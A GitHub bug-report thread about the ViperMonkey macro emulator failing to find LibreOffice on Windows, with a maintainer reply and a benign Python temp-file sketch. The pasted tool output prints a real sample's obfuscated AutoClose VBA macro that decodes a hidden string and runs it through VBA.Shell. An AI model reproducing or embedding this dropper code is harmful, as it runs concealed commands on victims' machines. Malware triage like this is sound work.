Vipermonkey says LibreOffice not installed, but it is #91

Open
opticoax747 opened this issue Dec 23, 2019 · 4 comments
@opticoax747

Running vipermonkey on flare-vm cygwin environment, trying to parse an infected .docm.

LibreOffice is installed, but Vipermonkey doesn't see it and errors out.
FILE: c:\Users\IEUser\Desktop\Files and PCAPs\f11b7237907275ca59ce4f0b630f69a6c3770b0060359917bf465690e2309e47 (1).docm
INFO Starting emulation...
INFO Emulating an Office (VBA) file. VBScript support is temporarily disabled in this version.

INFO Reading document metadata...
WARNING Reading in metadata failed. Trying fallback. not an OLE2 structured storage file
ERROR Cannot read metadata with exiftool. [Error 2] The system cannot find the file specified
ERROR Reading in file as Excel with xlrd failed. ZIP file contents not a known type of workbook

ERROR Cannot convert Excel file with LibreOffice. LibreOffice not installed.
INFO Saving dropped analysis artifacts in c:\Users\IEUser\Desktop\Files and PCAPs\f11b7237907275ca59ce4f0b630f69a6c3770b0060359917bf465690e2309e47 (1).docm_artifacts/
INFO Parsing VB...
Error: [Errno 2] No such file or directory: u'word/vbaProject.bin'.

VBA MACRO ThisDocument.cls
in file: word/vbaProject.bin - OLE stream: u'VBA/ThisDocument'



VBA CODE (with long lines collapsed):

Sub AutoClose()
roans = Array("d", "J", "t", "s", "e", "A", "h", "0", "h", "j", "t", "s", "s", "V", "o", "q", "q", "n", "P", "5", "Z", "n", "9", "P", "L", "l", "n", "9", "5", "n", "t", "9", "h", "9", "A", "x", "E", "d", "q", "G", "Q", "q", "J", "d", "5", "0", "A", "V", "t", "V", "N", "L", "s", "d", "e", "X", "P", "E", "l", "P")
totoro = ceraunogram(roans)

Application.Run "chillumchee", (totoro)

End Sub

Private Sub chillumchee(brothy)

declination = 6162
samoan = True

While samoan
boneblack = declination + 222
If boneblack - declination > 111 Then
VBA.Shell brothy, vbNormalFocus - 1
samoan = False
End If

Wend

End Sub

Public Function trinely(germaneness, preludium)

russophobist = 9090
categoryator = -1
For Each drolled In preludium
If drolled = germaneness Then
russophobist = categoryator
Exit For
End If

categoryator = categoryator + 1

Next

If russophobist = 9090 Then
russophobist = -1
End If

trinely = russophobist + 1
End Function

Private Function ceraunogram(roans)
malope = Array("s", "P", "G", "q", "e", "d", "9", "Q", "x", "E", "j", "n", "N", "X", "t", "h", "L", "o", "V", "0", "A", "J", "Z", "5", "l")
roughhoused = Array("t", "d", "N", "/", "a", "m", "w", "A", "c", "o", " ", "q", "?", "=", "h", "e", "u", ":", "p", "x", ".", "s", "j", "i", "n")

erasable = vbNullString

For Each paraphrenic In roans
ore = Application.Run("trinely", paraphrenic, malope)
If ore > -1 And ore < 8080 Then
erasable = roughhoused(ore) + erasable
End If
Next

ceraunogram = StrReverse(erasable)

End Function

PARSING VBA CODE:
INFO parsed Sub AutoClose (): 3 statement(s)
INFO parsed Sub chillumchee ([ByRef brothy]): 3 statement(s)
INFO parsed Function trinely ([ByRef germaneness, ByRef preludium]): 5 statement(s)
INFO parsed Function ceraunogram ([ByRef roans]): 5 statement(s)
INFO Reading document variables...
INFO Reading Shapes object text fields...
Traceback (most recent call last):
File "vmonkey.py", line 1311, in _process_file
shape_text = read_ole_fields._get_shapes_text_values(data, 'worddocument')
File "c:\Users\IEUser\Desktop\ViperMonkey-master\ViperMonkey-master\vipermonkey\core\read_ole_fields.py", line 371, in _get_shapes_text_values
r = _get_shapes_text_values_2007(fname)
File "c:\Users\IEUser\Desktop\ViperMonkey-master\ViperMonkey-master\vipermonkey\core\read_ole_fields.py", line 223, in _get_shapes_text_values_2007
f = open(tmp_name, 'wb')
IOError: [Errno 2] No such file or directory: '/tmp/9762170042.office'
ERROR [Errno 2] No such file or directory: '/tmp/9762170042.office'

c:\Users\IEUser\Desktop\ViperMonkey-master\ViperMonkey-master\vipermonkey

@decalage2 decalage2 self-assigned this Jan 2, 2020
@decalage2 decalage2 added the bug label Jan 2, 2020
@decalage2 decalage2 added this to the ViperMonkey 0.08 milestone Jan 2, 2020
@decalage2
Owner

I think for now the call to LibreOffice only works on Linux. Usually on Windows it displays an error but does not stop. I'll have a look.

@opticoax747
Author

OK, I will try to get a licensed version of Word on Windows? Would that be better?

@decalage2
Owner

No no, I just meant the code in ViperMonkey which deals with LibreOffice is only designed to work on Linux, because it uses paths like /tmp (see the error message you pasted above). What we need to do (if somebody has time) is to improve the code so that it can work with LibreOffice on Windows too.
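
The portability problem described in the comment above, as an added example that is not part of the thread and not ViperMonkey's own code: a Python 3 sketch that takes the scratch file location from the platform instead of a hard-coded /tmp and looks for the LibreOffice launcher on PATH before falling back to fixed install paths. The function names and the Windows install paths are assumptions made for illustration.

```python
import os
import shutil
import tempfile

# Assumed default install locations on Windows; adjust for the analysis host.
WINDOWS_CANDIDATES = (
    r"C:\Program Files\LibreOffice\program\soffice.exe",
    r"C:\Program Files (x86)\LibreOffice\program\soffice.exe",
)


def find_soffice(names=("soffice", "libreoffice"), candidates=WINDOWS_CANDIDATES):
    """Return the path of a LibreOffice launcher, or None if none is found."""
    for name in names:                      # PATH lookup first
        found = shutil.which(name)
        if found:
            return found
    for path in candidates:                 # then fixed install paths
        if os.path.isfile(path):
            return path
    return None


def write_scratch_copy(data, suffix=".office"):
    """Write sample bytes to a new file in the platform temp directory.

    mkstemp() takes the directory from TMPDIR/TEMP/TMP, so the same call
    works on hosts without /tmp, and it creates a uniquely named file
    exclusively instead of opening a guessable name.
    """
    fd, path = tempfile.mkstemp(suffix=suffix)
    with os.fdopen(fd, "wb") as handle:
        handle.write(data)
    return path


def remove_scratch_copy(path):
    """Delete the scratch copy so the sample does not linger on disk."""
    try:
        os.remove(path)
    except FileNotFoundError:
        pass


if __name__ == "__main__":
    sample = b"PK\x03\x04 constructed placeholder, not a real document"
    scratch = write_scratch_copy(sample)
    print("scratch file:", scratch)
    print("LibreOffice launcher:", find_soffice() or "not found")
    remove_scratch_copy(scratch)
```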

@opticoax747
Author

I did hardcode the path to Windows Libre Office into the .py, but it still errored out.

I think my office will give me a Word license...
